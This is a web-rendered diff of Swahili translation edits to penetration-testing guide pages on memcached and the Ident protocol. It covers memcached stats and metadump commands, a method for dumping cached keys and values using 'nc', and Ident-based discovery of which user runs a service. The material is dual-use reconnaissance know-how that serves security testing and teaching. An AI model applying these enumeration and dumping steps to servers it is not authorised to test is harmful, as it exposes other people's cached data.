Hii taarifa inaonyesha aina za slab zinazofanya kazi, vipande vinavyotumika, na takwimu za uendeshaji, ikitoa mwanga juu ya ufanisi wa operesheni za kusoma na kuandika.
Amri nyingine muhimu, "stats items", inatoa data kuhusu kufukuzwa, vikwazo vya kumbukumbu, na mizunguko ya vitu:
```bash
@ -107,7 +107,7 @@ END
```
Hii mbinu inarudiarudia madarasa ya slab, ikitoa na kwa hiari kutupa thamani za funguo.
### **KUTUPA FUNGUKA ZA MEMCACHE (VER 1.4.31+)**
### **KUTUPA THAMANI ZA MEMCACHE (VER 1.4.31+)**
Kwa toleo la memcache 1.4.31 na juu, mbinu mpya, salama zaidi ya kutupa funguo katika mazingira ya uzalishaji imeanzishwa, ikitumia hali isiyozuia kama ilivyoelezwa katika [release notes](https://github.com/memcached/memcached/wiki/ReleaseNotes1431). Njia hii inazalisha matokeo makubwa, hivyo mapendekezo ya kutumia amri 'nc' kwa ufanisi. Mifano ni pamoja na:
```bash
@ -135,20 +135,20 @@ Kumbuka kwamba kabla ya memcached 1.4 huwezi kuhifadhi vitu vikubwa kuliko 1MB k
### Never Set a Timeout > 30 Days! <a href="#never-set-a-timeout--30-days" id="never-set-a-timeout--30-days"></a>
Ikiwa unajaribu “kweka” au “kuongeza” funguo yenye muda wa kukatika zaidi ya kile kilichoruhusiwa, huenda usipate kile unachotarajia kwa sababu memcached kisha inachukulia thamani kama alama ya wakati wa Unix. Pia, ikiwa alama ya wakati iko katika zamani, haitafanya chochote kabisa. Amri yako itashindwa kimya.
Ikiwa unajaribu “kweka” au “kuongeza” funguo yenye muda wa kukatika zaidi ya kile kilichoruhusiwa, huenda usipate kile unachotarajia kwa sababu memcached kisha inachukulia thamani kama alama ya wakati wa Unix. Pia ikiwa alama ya wakati iko katika zamani haitafanya chochote kabisa. Amri yako itashindwa kimya.
Hivyo ikiwa unataka kutumia muda wa juu zaidi, eleza 2592000. Mfano:
Hivyo ikiwa unataka kutumia muda wa juu kabisa, eleza 2592000. Mfano:
```
set my_key 0 2592000 1
1
```
### Funguo Zinazotoweka Wakati wa Overflow <a href="#disappearing-keys-on-overflow" id="disappearing-keys-on-overflow"></a>
### Funguo Zinazotoweka kwenye Overflow <a href="#disappearing-keys-on-overflow" id="disappearing-keys-on-overflow"></a>
Licha ya hati kusema kitu kuhusu kuzunguka 64bit inayozidi thamani kwa kutumia “incr” inasababisha thamani kutoweka. Inahitaji kuundwa tena kwa kutumia “add”/”set”.
### Urejeleaji <a href="#replication" id="replication"></a>
memcached yenyewe haisaidii urejeleaji. Ikiwa unahitaji kweli inabidi utumie suluhisho za upande wa tatu:
memcached yenyewe haisaidii urejeleaji. Ikiwa unahitaji kweli, unahitaji kutumia suluhisho za upande wa tatu:
- [repcached](http://repcached.lab.klab.org/): Urejeleaji wa multi-master async (memcached 1.2 patch set)
- [Couchbase memcached interface](http://www.couchbase.com/memcached): Tumia CouchBase kama memcached drop-in

2
src/network-services-pentesting/11211-memcache/memcache-commands.md
View File

@ -31,7 +31,7 @@ Kwa bahati mbaya, maelezo ya sintaksia hayako wazi sana na amri rahisi ya msaada
| | | `stats detail` |
| | | `stats sizes` |
| | Rejesha hesabu za takwimu | `stats reset` |
| lru_crawler metadump | Tupa (zaidi ya) metadata kwa (vitu vyote) katika cache | `lru_crawler metadump all` |
| lru_crawler metadump | Fanya dump (zaidi ya) metadata kwa (vitu vyote) katika cache | `lru_crawler metadump all` |
| version | Chapisha toleo la seva. | `version` |
| verbosity | Ongeza kiwango cha kumbukumbu | `verbosity` |
| quit | Maliza kikao | `quit` |

4
src/network-services-pentesting/113-pentesting-ident.md
View File

@ -6,7 +6,7 @@
**Protokali ya Ident** inatumika juu ya **Internet** kuhusisha **muunganisho wa TCP** na mtumiaji maalum. Ilipangwa awali kusaidia katika **usimamizi wa mtandao** na **usalama**, inafanya kazi kwa kuruhusu seva kuuliza mteja kwenye bandari 113 ili kutafuta taarifa kuhusu mtumiaji wa muunganisho maalum wa TCP.
Hata hivyo, kutokana na wasiwasi wa kisasa kuhusu faragha na uwezekano wa matumizi mabaya, matumizi yake yamepungua kwani yanaweza bila kukusudia kufichua taarifa za mtumiaji kwa vyama visivyoidhinishwa. Hatua za usalama zilizoboreshwa, kama vile muunganisho wa siri na udhibiti mkali wa ufikiaji, zinapendekezwa kupunguza hatari hizi.
Hata hivyo, kutokana na wasiwasi wa kisasa kuhusu faragha na uwezekano wa matumizi mabaya, matumizi yake yamepungua kwani yanaweza bila kukusudia kufichua taarifa za mtumiaji kwa vyama visivyoidhinishwa. Hatua za usalama zilizoboreshwa, kama vile muunganisho wa siri na udhibiti mkali wa ufikiaji, zinapendekezwa ili kupunguza hatari hizi.
**Bandari ya kawaida:** 113
```
@ -17,7 +17,7 @@ PORT STATE SERVICE
### **Mkononi - Pata mtumiaji/Baini huduma**
Ikiwa mashine inafanya kazi na huduma ident na samba (445) na umeunganishwa na samba ukitumia bandari 43218. Unaweza kupata ni mtumiaji gani anayeendesha huduma ya samba kwa kufanya:
Ikiwa mashine inafanya kazi huduma ya ident na samba (445) na umeunganishwa na samba ukitumia bandari 43218. Unaweza kupata ni mtumiaji gani anayeendesha huduma ya samba kwa kufanya:
![](<../images/image (843).png>)

Some files were not shown because too many files have changed in this diff Show More